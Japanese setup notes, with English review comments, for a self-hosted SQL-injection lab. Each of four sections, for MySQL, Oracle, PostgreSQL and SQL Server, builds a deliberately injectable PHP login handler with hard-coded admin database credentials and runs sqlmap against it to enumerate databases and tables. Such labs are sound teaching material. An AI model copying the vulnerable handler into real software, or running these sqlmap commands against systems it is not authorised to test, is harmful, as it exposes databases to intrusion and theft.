(8.0.31)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://happyquality.com/2013/02/11/2587.htm
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
# Step 1: PHP 7.4 from the remi repository, with the mysqli extension the handler below needs.
yum -y install epel-release
# NOTE(review): the remi release RPM is fetched over plain http from a legacy host, and a package
# given by URL is not signature-checked unless localpkg_gpgcheck is enabled — TODO confirm; the
# RL8 section of these notes already uses https://rpms.remirepo.net for the same package.
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
ls -l /etc/yum.repos.d/
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-pecl-mysql
# confirm the mysqli driver is present before building the target site
php74 -i | grep mysqli
-- 2. Apacheインストール
# Step 2: enable Apache and publish a phpinfo() page to check that PHP is wired in.
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
# info.php discloses the full PHP/Apache configuration to any client that can reach the host;
# it is only a diagnostic page, so remove it once the URL below has been checked.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.66/info.php
-- 3. 攻撃対象サイト作成
# Step 3: open an interactive mysql session on the lab database (no -u/-p given, so the client's defaults apply)
mysql test
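-- Lab fixture: a minimal users table with the one row the login form can match.
-- IF EXISTS makes the block re-runnable on a fresh database without an error.
drop table if exists users;
-- passwords are stored as plaintext varchar; the PHP handler compares them directly in SQL
create table users (name varchar(30), pwd varchar(30));
insert into users (name, pwd) values ('admin', 'admin');
select name, pwd from users;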
exit
# confirm that the root/password credentials hard-coded in sql_injection.php work over TCP.
# MYSQL_PWD on the command line ends up in shell history and is readable from the client's
# process environment; note also that the web handler connects as MySQL root.
MYSQL_PWD='password' mysql -h localhost -u root test
exit
cd /var/www/html
<!-- lab login form: both fields are POSTed verbatim to sql_injection.php -->
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- plain text input rather than type="password": the typed value is shown on screen -->
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
// sql_injection.php (MySQL variant): the lab's deliberately injectable login handler,
// the target that step 5 (sqlmap) is pointed at; the $sql string below is the sink.
session_start();
header('Content-Type: text/html; charset=UTF-8');
// untrusted input straight from the POST body; '@' only silences the undefined-index notice
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
// hard-coded credentials for the MySQL root account: anything injected through the
// query below runs with root's privileges on the database server
$con = mysqli_connect('localhost', 'root', 'password', 'test');
// SINK: both POST values are interpolated into the SQL text unescaped and unbound.
// The non-lab form of this line is a prepared statement, e.g.
//   $st = mysqli_prepare($con, 'SELECT name FROM users WHERE name = ? AND pwd = ?');
//   mysqli_stmt_bind_param($st, 'ss', $name, $pwd);
// (comparing a plaintext password inside SQL is a second issue this lab does not address)
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
// return value is not checked: on a failed query $rs is false and mysqli_num_rows()
// below is handed a bool instead of a result set
$rs = mysqli_query($con, $sql);
?>
<html>
<body>
<?php
// any matching row counts as a login; the raw untrusted name is stored in the session
// and the session id is not regenerated after success (no session_regenerate_id())
if (mysqli_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
mysqli_close($con);
?>
</body>
</html>
# CLI smoke test of the handler (no POST data, so both inputs are empty and the page should print the failure text)
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.66/sql_injection.html
-- 4. sqlmapインストール
# Step 4: fetch sqlmap from its upstream repository.
# The clone is unpinned (no tag or commit), so each run of these notes gets whatever the default branch holds.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
# Step 5: run sqlmap against the lab handler; the POST body mirrors the form's NAME/PWD field names.
# From the defender's side each run is a burst of POSTs to the one URL in the httpd access log,
# which is the pattern a log review or WAF rule would key on.
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables
(19c)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://nodachisoft.com/common/jp/article/jp000046/
https://www.php.net/manual/ja/function.oci-fetch-row.php
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
# Step 1: PHP 7.4 from the remi repository, plus pear/devel/cli so the OCI8 extension can be built in step 3.
yum -y install epel-release
# NOTE(review): the remi release RPM is fetched over plain http from a legacy host, and a package
# given by URL is not signature-checked unless localpkg_gpgcheck is enabled — TODO confirm; the
# RL8 section of these notes already uses https://rpms.remirepo.net for the same package.
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-pear php74-php-devel php74-php-cli
※↓ エラー 「Cannot find sys/sdt.h which is required for DTrace support」回避のため追加インストール
# build dependency for the OCI8 build in step 3 (provides sys/sdt.h, see the note above)
yum -y install systemtap systemtap-runtime systemtap-sdt-devel
-- 2. Oracle Instant Clientインストール
# Step 2: Oracle Instant Client 19.17 (basic + devel) straight from download.oracle.com.
# NOTE(review): installing by URL skips the repository GPG check unless localpkg_gpgcheck is set — TODO confirm.
yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-basic-19.17.0.0.0-1.x86_64.rpm
yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-devel-19.17.0.0.0-1.x86_64.rpm
-- 3. OCI8インストール
# Step 3: build the OCI8 extension from a PECL tarball against the Instant Client headers.
# The tarball is used without a checksum or signature check — TODO confirm against pecl.php.net before trusting the build.
wget https://pecl.php.net/get/oci8-2.2.0.tgz
echo "extension=oci8.so" > /etc/opt/remi/php74/php.d/90_oci8.ini
# presumably the reason the systemtap headers were needed in step 1 (DTrace probes in the build)
export PHP_DTRACE=yes
C_INCLUDE_PATH=/usr/lib/oracle/19.17/client64 /opt/remi/php74/root/usr/bin/pecl install oci8-2.2.0.tgz
# confirm the extension loaded
php74 -i | grep OCI
-- 4. Apacheインストール
# Step 4: enable Apache and publish a phpinfo() page to check that PHP is wired in.
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
# info.php discloses the full PHP/Apache configuration to any client that can reach the host;
# it is only a diagnostic page, so remove it once the URL below has been checked.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.65/info.php
-- 5. 攻撃対象サイト作成
# Step 5: open a SQL*Plus session as the lab schema. The test/test credentials on the command
# line are visible in the process list and shell history; they are also what the PHP handler hard-codes.
su - oracle
sqlplus test/test@localhost:1521/pdb1.example.com
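-- Lab fixture: a minimal users table with the one row the login form can match.
-- Oracle has no DROP TABLE IF EXISTS: on a fresh schema this DROP fails with ORA-00942 and SQL*Plus carries on.
drop table users purge;
-- passwords are stored as plaintext varchar2; the PHP handler compares them directly in SQL
create table users (name varchar2(30), pwd varchar2(30));
insert into users (name, pwd) values ('admin', 'admin');
commit;
select name, pwd from users;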
# leave SQL*Plus, then the oracle login shell
exit
exit
cd /var/www/html
<!-- lab login form: both fields are POSTed verbatim to sql_injection.php -->
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- plain text input rather than type="password": the typed value is shown on screen -->
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
// sql_injection.php (Oracle variant): the lab's deliberately injectable login handler,
// the target that step 7 (sqlmap) is pointed at; the oci_parse() string below is the sink.
session_start();
header('Content-Type: text/html; charset=UTF-8');
// untrusted input straight from the POST body; '@' only silences the undefined-index notice
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
// hard-coded schema credentials (test/test) for the PDB the fixture was created in
$con = oci_connect('test', 'test', 'localhost:1521/pdb1.example.com');
// SINK: both POST values are interpolated into the SQL text unbound. The non-lab form
// parses a statement with :name / :pwd placeholders and attaches the values with
// oci_bind_by_name() before oci_execute().
$stid = oci_parse($con, "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
// return value ignored: a failed execute is never reported (no oci_error() check)
oci_execute($stid);
?>
<html>
<body>
<?php
// oci_fetch_row() returns the row as an array, or false when nothing matched. PHP's loose
// comparison orders any array above an int, so `> 0` is true for every fetched row;
// `!== false` would state the intent explicitly. The raw untrusted name is stored in the
// session and the session id is not regenerated after success (no session_regenerate_id()).
if (oci_fetch_row($stid) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
oci_close($con);
?>
</body>
</html>
# CLI smoke test of the handler (no POST data, so both inputs are empty and the page should print the failure text)
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.65/sql_injection.html
-- 6. sqlmapインストール
# Step 6: fetch sqlmap from its upstream repository.
# The clone is unpinned (no tag or commit), so each run of these notes gets whatever the default branch holds.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 7. 動作確認
# Step 7: run sqlmap against the lab handler; the POST body mirrors the form's NAME/PWD field names.
# From the defender's side each run is a burst of POSTs to the one URL in the httpd access log,
# which is the pattern a log review or WAF rule would key on.
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables
(15)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://www.server-world.info/query?os=Rocky_Linux_8&p=httpd&f=6
前提:
攻撃元と攻撃先は同一サーバ (OS: RL8)
DB作成済み
-- 1. phpインストール
# Step 1: PHP 7.4 from the remi repository (over https this time), with the pgsql extension the handler below needs.
dnf -y install https://rpms.remirepo.net/enterprise/remi-release-8.rpm
dnf repolist all
dnf -y search php74
dnf -y install php74 php74-php php74-php-pgsql
# confirm the pgsql driver is present before building the target site
php74 -i | grep pgsql
-- 2. Apacheインストール
# Step 2: enable Apache and php-fpm, then publish a phpinfo() page to check that PHP is wired in.
systemctl enable httpd php-fpm
systemctl restart httpd php-fpm
systemctl status httpd php-fpm
# info.php discloses the full PHP/Apache configuration to any client that can reach the host;
# it is only a diagnostic page, so remove it once the URL below has been checked.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.55/info.php
-- 3. 攻撃対象サイト作成
# Step 3: open a psql session on the lab database as the postgres OS user (local peer auth assumed — confirm in pg_hba.conf)
su - postgres
psql test
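-- Lab fixture: a minimal users table with the one row the login form can match.
-- IF EXISTS makes the block re-runnable on a fresh database without an error.
drop table if exists users;
-- passwords are stored as plaintext varchar; the PHP handler compares them directly in SQL
create table users (name varchar(30), pwd varchar(30));
insert into users (name, pwd) values ('admin', 'admin');
select name, pwd from users;
-- sets the password the PHP handler hard-codes; note that the web app therefore
-- connects as the database superuser, so any injected statement runs with that role
alter user postgres with password 'postgres';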
\q
# confirm the postgres/postgres credentials work over TCP, the way the handler connects.
# PGPASSWORD on the command line ends up in shell history and is readable from the
# client's process environment.
PGPASSWORD=postgres psql -h localhost -d test -U postgres
\q
exit
cd /var/www/html
<!-- lab login form: both fields are POSTed verbatim to sql_injection.php -->
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- plain text input rather than type="password": the typed value is shown on screen -->
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
// sql_injection.php (PostgreSQL variant): the lab's deliberately injectable login handler,
// the target that step 5 (sqlmap) is pointed at; the $sql string below is the sink.
session_start();
header('Content-Type: text/html; charset=UTF-8');
// untrusted input straight from the POST body; '@' only silences the undefined-index notice
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
// hard-coded credentials for the postgres superuser: anything injected through the
// query below runs with superuser privileges on the database
$con = pg_connect("host=localhost dbname=test user=postgres password=postgres");
// SINK: both POST values are interpolated into the SQL text unescaped and unbound.
// The non-lab form of this line binds them server-side, e.g.
//   $rs = pg_query_params($con, 'SELECT name FROM users WHERE name = $1 AND pwd = $2', [$name, $pwd]);
// (comparing a plaintext password inside SQL is a second issue this lab does not address)
$sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
// return value is not checked: on a failed query $rs is false and pg_num_rows()
// below is handed a bool instead of a result resource
$rs = pg_query($con, $sql);
?>
<html>
<body>
<?php
// any matching row counts as a login; the raw untrusted name is stored in the session
// and the session id is not regenerated after success (no session_regenerate_id())
if (pg_num_rows($rs) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
pg_close($con);
?>
</body>
</html>
# CLI smoke test of the handler (no POST data, so both inputs are empty and the page should print the failure text)
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.55/sql_injection.html
-- 4. sqlmapインストール
# Step 4: fetch sqlmap from its upstream repository.
# The clone is unpinned (no tag or commit), so each run of these notes gets whatever the default branch holds.
dnf -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
# Step 5: run sqlmap against the lab handler; the POST body mirrors the form's NAME/PWD field names.
# From the defender's side each run is a burst of POSTs to the one URL in the httpd access log,
# which is the pattern a log review or WAF rule would key on.
python3 sqlmap.py --help
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2"
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --tables
(2019)
https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://stackoverflow.com/questions/31569675/pdo-equivalent-of-mysql-num-rows-or-mssql-num-rows
前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み
-- 1. phpインストール
# Step 1: PHP 7.4 from the remi repository, with the sqlsrv PDO driver the handler below needs.
yum -y install epel-release
# NOTE(review): the remi release RPM is fetched over plain http from a legacy host, and a package
# given by URL is not signature-checked unless localpkg_gpgcheck is enabled — TODO confirm; the
# RL8 section of these notes already uses https://rpms.remirepo.net for the same package.
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
yum repolist all
yum -y search php74
yum -y install php74 php74-php php74-php-sqlsrv
# confirm the PDO driver is present before building the target site
php74 -i | grep PDO
-- 2. Apacheインストール
# Step 2: enable Apache and publish a phpinfo() page to check that PHP is wired in.
systemctl enable httpd
systemctl restart httpd
systemctl status httpd
# info.php discloses the full PHP/Apache configuration to any client that can reach the host;
# it is only a diagnostic page, so remove it once the URL below has been checked.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php
http://192.168.137.127/info.php
-- 3. 攻撃対象サイト作成
# Step 3: open a sqlcmd session as SA. The password on the command line is visible in the
# process list and shell history; SA is also the login the PHP handler hard-codes.
sqlcmd -S localhost -U SA -P 'password'
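-- Lab fixture: a minimal users table with the one row the login form can match.
-- sqlcmd buffers everything up to GO, so the whole batch runs in the 'test' database.
use test;
-- DROP TABLE IF EXISTS is T-SQL since SQL Server 2016; it makes the batch re-runnable on a fresh database
drop table if exists users;
-- passwords are stored as plaintext varchar; the PHP handler compares them directly in SQL
create table users (name varchar(30), pwd varchar(30));
insert into users (name, pwd) values ('admin', 'admin');
select name, pwd from users;
go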
# leave sqlcmd and move to the web root
quit
cd /var/www/html
<!-- lab login form: both fields are POSTed verbatim to sql_injection.php -->
<html>
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- plain text input rather than type="password": the typed value is shown on screen -->
パスワード<input type="text" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>
<?php
// sql_injection.php (SQL Server / PDO variant): the lab's deliberately injectable login
// handler, the target that step 5 (sqlmap) is pointed at; the query() string below is the sink.
session_start();
header('Content-Type: text/html; charset=UTF-8');
// untrusted input straight from the POST body; '@' only silences the undefined-index notice
$name = @$_POST['NAME'];
$pwd = @$_POST['PWD'];
// hard-coded credentials for the SA login: anything injected through the query
// below runs as the instance administrator
$user = 'SA';
$pass = 'password';
$host = 'localhost';
$port = 1433;
$dbname = 'test';
$dsn = "sqlsrv:server=$host,$port;database=$dbname";
// no error mode set: PDO's default in PHP 7.4 is silent, so a failed query() returns
// false rather than throwing — TODO confirm no php.ini/driver option changes this
$con = new PDO($dsn, $user, $pass);
// SINK: both POST values are interpolated into the SQL text unescaped and unbound.
// The non-lab form of these two lines is a prepared statement, e.g.
//   $pst = $con->prepare('SELECT name FROM users WHERE name = ? AND pwd = ?');
//   $pst->execute([$name, $pwd]);
// (comparing a plaintext password inside SQL is a second issue this lab does not address)
$pst = $con->query("SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
// with the silent error mode, a failed query leaves $pst === false and this call is a fatal error
$result = $pst->fetchAll(PDO::FETCH_ASSOC);
?>
<html>
<body>
<?php
// any matching row counts as a login; the raw untrusted name is stored in the session
// and the session id is not regenerated after success (no session_regenerate_id())
if (count($result) > 0) {
$_SESSION['name'] = $name;
echo 'ログイン成功';
} else {
echo 'ログイン失敗';
}
// dropping the last reference closes the PDO connection
$con = null;
?>
</body>
</html>
# CLI smoke test of the handler (no POST data, so both inputs are empty and the page should print the failure text)
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php
http://192.168.137.127/sql_injection.html
-- 4. sqlmapインストール
# Step 4: fetch sqlmap from its upstream repository.
# The clone is unpinned (no tag or commit), so each run of these notes gets whatever the default branch holds.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
-- 5. 動作確認
# Step 5: run sqlmap against the lab handler; the POST body mirrors the form's NAME/PWD field names.
# From the defender's side each run is a burst of POSTs to the one URL in the httpd access log,
# which is the pattern a log review or WAF rule would key on.
python sqlmap.py --help
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2"
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" --dbs
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables